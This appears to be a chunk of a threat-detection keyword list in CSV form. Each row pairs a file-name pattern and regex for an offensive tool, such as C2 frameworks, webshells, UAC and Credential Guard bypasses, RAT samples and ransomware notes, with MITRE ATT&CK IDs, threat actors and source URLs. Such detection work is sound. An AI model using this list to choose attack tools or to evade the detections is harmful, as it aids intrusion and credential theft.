"*\brutereflect.dll*",".{0,1000}\\brutereflect\.dll.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","14407" "*\BX RAT V*.exe*",".{0,1000}\\BX\sRAT\sV.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","14411" "*\BX RAT.exe*",".{0,1000}\\BX\sRAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","14412" "*\BypassAddUser.exe*",".{0,1000}\\BypassAddUser\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 
- T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","14413" "*\BypassAddUser.exe*",".{0,1000}\\BypassAddUser\.exe.{0,1000}","offensive_tool_keyword","BypassAddUser","Bypass antivirus software to add users","T1562.001 - T1078.002 - T1136.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TryA9ain/BypassAddUser","1","0","N/A","N/A","6","1","46","8","2020-12-12T05:11:35Z","2020-12-12T04:15:06Z","14414" "*\BypassAddUser.pdb*",".{0,1000}\\BypassAddUser\.pdb.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#content","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","14415" "*\BypassAddUser-master*",".{0,1000}\\BypassAddUser\-master.{0,1000}","offensive_tool_keyword","BypassAddUser","Bypass antivirus software to add users","T1562.001 - T1078.002 - T1136.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TryA9ain/BypassAddUser","1","0","N/A","N/A","6","1","46","8","2020-12-12T05:11:35Z","2020-12-12T04:15:06Z","14416" "*\bypass-clm.exe*",".{0,1000}\\bypass\-clm\.exe.{0,1000}","offensive_tool_keyword","bypass-clm","PowerShell Constrained Language Mode 
Bypass","T1059.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/calebstewart/bypass-clm","1","0","N/A","N/A","8","3","261","38","2021-01-31T19:13:55Z","2021-01-29T04:46:23Z","14417" "*\bypass-clm.sln*",".{0,1000}\\bypass\-clm\.sln.{0,1000}","offensive_tool_keyword","bypass-clm","PowerShell Constrained Language Mode Bypass","T1059.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/calebstewart/bypass-clm","1","0","N/A","N/A","8","3","261","38","2021-01-31T19:13:55Z","2021-01-29T04:46:23Z","14418" "*\bypass-clm\Program.cs*",".{0,1000}\\bypass\-clm\\Program\.cs.{0,1000}","offensive_tool_keyword","bypass-clm","PowerShell Constrained Language Mode Bypass","T1059.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/calebstewart/bypass-clm","1","0","N/A","N/A","8","3","261","38","2021-01-31T19:13:55Z","2021-01-29T04:46:23Z","14419" "*\BypassCredGuard.cpp*",".{0,1000}\\BypassCredGuard\.cpp.{0,1000}","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1003 - T1112 - T1555.002 - T1574","TA0006 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/wh0amitz/BypassCredGuard","1","0","N/A","N/A","10","4","323","52","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z","14420" "*\BypassCredGuard.exe*",".{0,1000}\\BypassCredGuard\.exe.{0,1000}","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1003 - T1112 - T1555.002 - T1574","TA0006 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/wh0amitz/BypassCredGuard","1","0","N/A","N/A","10","4","323","52","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z","14421" "*\BypassCredGuard.exe*",".{0,1000}\\BypassCredGuard\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 
- T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","14422" "*\BypassCredGuard.log*",".{0,1000}\\BypassCredGuard\.log.{0,1000}","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1003 - T1112 - T1555.002 - T1574","TA0006 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/wh0amitz/BypassCredGuard","1","0","N/A","N/A","10","4","323","52","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z","14423" "*\bypasscredguard.pdb*",".{0,1000}\\bypasscredguard\.pdb.{0,1000}","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1003 - T1112 - T1555.002 - T1574","TA0006 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/wh0amitz/BypassCredGuard","1","0","N/A","N/A","10","4","323","52","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z","14424" "*\bypass-iisuser-p.asp*",".{0,1000}\\bypass\-iisuser\-p\.asp.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","14425" "*\bypassuac.txt*",".{0,1000}\\bypassuac\.txt.{0,1000}","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","0","N/A","N/A","10","5","433","56","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z","14426" 
"*\bypassuac.txt*",".{0,1000}\\bypassuac\.txt.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of UAC Bypass Techniques Weaponized as BOFs","T1548.002 - T1203 - T1055 - T1134.002","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/icyguider/UAC-BOF-Bonanza","1","0","N/A","N/A","10","6","500","65","2024-02-21T22:07:54Z","2024-02-16T14:47:13Z","14427" "*\bypassuac-x64.dll*",".{0,1000}\\bypassuac\-x64\.dll.{0,1000}","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002 - T1021","TA0001 - TA0002 - TA0003","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Exploitation tool","https://github.com/rapid7/metasploit-framework","1","0","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","14428" "*\bypass-waf.asp*",".{0,1000}\\bypass\-waf\.asp.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","14429" "*\bypass-with-base32.php*",".{0,1000}\\bypass\-with\-base32\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","14430" "*\C$\__output*",".{0,1000}\\C\$\\__output.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","smbexec behavior","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","14431" "*\C$\wh0nqs.txt.*",".{0,1000}\\C\$\\wh0nqs\.txt\..{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","N/A","10","5","430","52","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z","14432" "*\c2_server.py*",".{0,1000}\\c2_server\.py.{0,1000}","offensive_tool_keyword","Commander","A command and control (C2) server","T1021 - T1027 - T1059","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/voukatas/Commander","1","0","N/A","N/A","10","10","56","16","2024-07-05T11:05:30Z","2023-02-03T16:46:33Z","14433" "*\c2_setup_token.txt*",".{0,1000}\\c2_setup_token\.txt.{0,1000}","offensive_tool_keyword","hak5 cloudc2","Cloud C2 makes it easy for pentesters and security teams to deploy and manage Hak5 gear from the cloud","T1021 - T1102 - T1213","TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://shop.hak5.org/products/c2?","1","0","N/A","N/A","10","9","N/A","N/A","N/A","N/A","14434" "*\c2-3.4.0.zip*",".{0,1000}\\c2\-3\.4\.0\.zip.{0,1000}","offensive_tool_keyword","hak5 cloudc2","Cloud C2 makes it easy for 
pentesters and security teams to deploy and manage Hak5 gear from the cloud","T1021 - T1102 - T1213","TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://shop.hak5.org/products/c2?","1","0","N/A","N/A","10","9","N/A","N/A","N/A","N/A","14435" "*\c2-3.4.0_amd64_windows.exe*",".{0,1000}\\c2\-3\.4\.0_amd64_windows\.exe.{0,1000}","offensive_tool_keyword","hak5 cloudc2","Cloud C2 makes it easy for pentesters and security teams to deploy and manage Hak5 gear from the cloud","T1021 - T1102 - T1213","TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://shop.hak5.org/products/c2?","1","0","N/A","N/A","10","9","N/A","N/A","N/A","N/A","14436" "*\c2-3.4.0_i386_windows.exe*",".{0,1000}\\c2\-3\.4\.0_i386_windows\.exe.{0,1000}","offensive_tool_keyword","hak5 cloudc2","Cloud C2 makes it easy for pentesters and security teams to deploy and manage Hak5 gear from the cloud","T1021 - T1102 - T1213","TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://shop.hak5.org/products/c2?","1","0","N/A","N/A","10","9","N/A","N/A","N/A","N/A","14437" "*\c2-3.4.0_i386_windows.exe*",".{0,1000}\\c2\-3\.4\.0_i386_windows\.exe.{0,1000}","offensive_tool_keyword","hak5 cloudc2","Cloud C2 makes it easy for pentesters and security teams to deploy and manage Hak5 gear from the cloud","T1021 - T1102 - T1213","TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://shop.hak5.org/products/c2?","1","0","N/A","N/A","10","9","N/A","N/A","N/A","N/A","14438" "*\C2concealer*",".{0,1000}\\C2concealer.{0,1000}","offensive_tool_keyword","C2concealer","C2concealer is a command line tool that generates randomized C2 malleable profiles for use in Cobalt Strike.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/C2concealer","1","0","N/A","N/A","10","10","1053","172","2024-06-25T11:10:54Z","2020-03-23T14:13:16Z","14439" 
"*\C2Config.ini*",".{0,1000}\\C2Config\.ini.{0,1000}","offensive_tool_keyword","ReverseSock5Proxy","A tiny Reverse Sock5 Proxy","T1090.002 - T1572 - T1071","TA0011 - TA0010","N/A","N/A","C2","https://github.com/Coldzer0/ReverseSock5Proxy","1","0","N/A","N/A","10","10","317","42","2022-11-28T21:18:26Z","2022-11-25T15:12:59Z","14440" "*\C2Prank.ps1*",".{0,1000}\\C2Prank\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","14441" "*\C2ReverseProxy\*",".{0,1000}\\C2ReverseProxy\\.{0,1000}","offensive_tool_keyword","C2ReverseProxy","ReverseProxy C2 - Bring CS online without going offline","T1090 - T1090.002 - T1573 - T1573.001 - T1573.002","TA0011","N/A","N/A","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","0","N/A","N/A","10","10","486","56","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z","14442" "*\C2ReverseServer*",".{0,1000}\\C2ReverseServer.{0,1000}","offensive_tool_keyword","C2ReverseProxy","ReverseProxy C2 - Bring CS online without going offline","T1090 - T1090.002 - T1573 - T1573.001 - T1573.002","TA0011","N/A","N/A","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","0","N/A","N/A","10","10","486","56","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z","14443" "*\C2script\*.ashx*",".{0,1000}\\C2script\\.{0,1000}\.ashx.{0,1000}","offensive_tool_keyword","C2ReverseProxy","ReverseProxy C2 - Bring CS online without going offline","T1090 - T1090.002 - 
T1573 - T1573.001 - T1573.002","TA0011","N/A","N/A","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","0","N/A","N/A","10","10","486","56","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z","14444" "*\C2script\*.jsp*",".{0,1000}\\C2script\\.{0,1000}\.jsp.{0,1000}","offensive_tool_keyword","C2ReverseProxy","ReverseProxy C2 - Bring CS online without going offline","T1090 - T1090.002 - T1573 - T1573.001 - T1573.002","TA0011","N/A","N/A","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","0","N/A","N/A","10","10","486","56","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z","14445" "*\C2script\*.php*",".{0,1000}\\C2script\\.{0,1000}\.php.{0,1000}","offensive_tool_keyword","C2ReverseProxy","ReverseProxy C2 - Bring CS online without going offline","T1090 - T1090.002 - T1573 - T1573.001 - T1573.002","TA0011","N/A","N/A","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","0","N/A","N/A","10","10","486","56","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z","14446" "*\C3WebController.dll*",".{0,1000}\\C3WebController\.dll.{0,1000}","offensive_tool_keyword","C3","Framework designed for red teams to create and manage custom C2 (Command and Control) channels. 
Unlike traditional C2 frameworks that rely on typical communication methods like HTTP/S DNS or TCP - C3 allows for the creation of non-traditional and esoteric C2 channels using platforms like Slack Dropbox GitHub OneDrive and more.","T1071 - T1102 - T1090 - T1573 - T1048","TA0011 - TA0002 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/WithSecureLabs/C3","1","0","N/A","N/A","9","10","1602","276","2023-03-04T20:32:13Z","2019-08-30T11:21:04Z","14449" "*\c99_locus7s.php*",".{0,1000}\\c99_locus7s\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","14450" "*\c99_PSych0.php*",".{0,1000}\\c99_PSych0\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","14451" "*\c99_w4cking.php*",".{0,1000}\\c99_w4cking\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","14452" "*\c99madshell.php*",".{0,1000}\\c99madshell\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","14453" 
"*\c99shell.php*",".{0,1000}\\c99shell\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","14454" "*\CachedGPPPassword.cs*",".{0,1000}\\CachedGPPPassword\.cs.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","14455" "*\cachedump.py*",".{0,1000}\\cachedump\.py.{0,1000}","offensive_tool_keyword","creddump7","extracts various forms of credentials from Windows systems","T1003 - T1081 - T1040 - T1110 - T1555","TA0006 - TA0009","N/A","Sandworm","Credential Access","https://github.com/CiscoCXSecurity/creddump7","1","0","N/A","N/A","10","4","394","106","2020-10-02T13:25:16Z","2014-06-24T13:18:38Z","14456" "*\cachedump.py*",".{0,1000}\\cachedump\.py.{0,1000}","offensive_tool_keyword","responder","LLMNR. 
NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/lgandx/Responder-Windows/","1","0","N/A","N/A","N/A","6","523","137","2024-07-30T11:10:05Z","2015-02-07T22:59:04Z","14457" "*\cAcTuS.readme.txt*",".{0,1000}\\cAcTuS\.readme\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","14458" "*\cAcTuS.readme_2.txt*",".{0,1000}\\cAcTuS\.readme_2\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","14459" "*\cAcTuS.readme_3.txt*",".{0,1000}\\cAcTuS\.readme_3\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","14460" "*\cAcTuS.readme_4.txt*",".{0,1000}\\cAcTuS\.readme_4\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","14461" "*\cAcTuS.readme_5.txt*",".{0,1000}\\cAcTuS\.readme_5\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes 
archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","14462" "*\CaiDao-Webshell-Password-LandGrey.jsp*",".{0,1000}\\CaiDao\-Webshell\-Password\-LandGrey\.jsp.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","14463" "*\CamHacker\*",".{0,1000}\\CamHacker\\.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","N/A","10","","N/A","","","","14464" "*\canisrufus.py*",".{0,1000}\\canisrufus\.py.{0,1000}","offensive_tool_keyword","canisrufus","A stealthy Python based Windows backdoor that uses Github as a command and control server","T1105 - T1071 - T1027","TA0003 - TA0011 - TA0005 - TA0010","N/A","Black Basta","C2","https://github.com/maldevel/canisrufus","1","0","N/A","N/A","10","10","263","78","2017-08-15T15:46:20Z","2017-08-12T06:49:40Z","14465" "*\capcom_sys_exec.x64.dll*",".{0,1000}\\capcom_sys_exec\.x64\.dll.{0,1000}","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002 - T1021","TA0001 - TA0002 - TA0003","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Exploitation tool","https://github.com/rapid7/metasploit-framework","1","0","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","14466" "*\CAPS 
LOCK.exe*",".{0,1000}\\CAPS\sLOCK\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","14467" "*\capture_netntlmv2.py*",".{0,1000}\\capture_netntlmv2\.py.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","14468" "*\capture_netntlmv2.txt*",".{0,1000}\\capture_netntlmv2\.txt.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","14469" "*\Catch me.exe*",".{0,1000}\\Catch\sme\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","14470" 
"*\catspin-main\*",".{0,1000}\\catspin\-main\\.{0,1000}","offensive_tool_keyword","catspin","Catspin rotates the IP address of HTTP requests making IP based blocks or slowdown measures ineffective. It is based on AWS API Gateway and deployed via AWS Cloudformation.","T1027 - T1071 - T1047 - T1090","TA0042 - TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/rootcathacking/catspin","1","0","N/A","N/A","9","3","261","32","2024-03-01T09:25:02Z","2022-07-26T08:08:33Z","14471" "*\ccmpwn.py*",".{0,1000}\\ccmpwn\.py.{0,1000}","offensive_tool_keyword","ccmpwn","Lateral Movement script that leverages the CcmExec service to remotely hijack user sessions","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/mandiant/ccmpwn","1","0","N/A","N/A","10","3","201","25","2024-03-26T20:51:27Z","2024-03-14T18:43:24Z","14473" "*\ccmpwn\*",".{0,1000}\\ccmpwn\\.{0,1000}","offensive_tool_keyword","ccmpwn","Lateral Movement script that leverages the CcmExec service to remotely hijack user sessions","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/mandiant/ccmpwn","1","0","N/A","N/A","10","3","201","25","2024-03-26T20:51:27Z","2024-03-14T18:43:24Z","14474" "*\Certify.exe*",".{0,1000}\\Certify\.exe.{0,1000}","offensive_tool_keyword","Certify","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","Certify","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","14475" 